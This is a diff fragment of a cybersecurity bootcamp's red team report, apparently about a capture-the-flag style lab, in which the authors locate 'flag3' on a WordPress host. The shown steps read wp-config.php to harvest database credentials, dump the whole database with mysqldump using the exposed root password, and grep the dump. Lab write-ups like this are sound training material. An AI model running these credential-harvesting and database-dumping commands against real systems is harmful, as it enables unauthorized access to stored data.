chrismah/UoT-Cybersecurity-Bootcamp/Final Project/Red Team Report.md

   - Same exploit used to obtain flag 1
   -
 #### Method
+Using the existing access we were able to locate `flag3` by harvesting the WordPress database login credentials
 ```
 $ cat /var/www/html/wordpress/wp-config.php
 ```
 ![wp_config](images/wp_config.png)
+With these credentials we dumped the entire database using the following command
 ```
 $ mysqldump wordpress -u root -pR@v3nSecurity > dump
 ```
+After dumping we ran a search for `flag3`
 ```
 $ grep “flag3” dump
 ```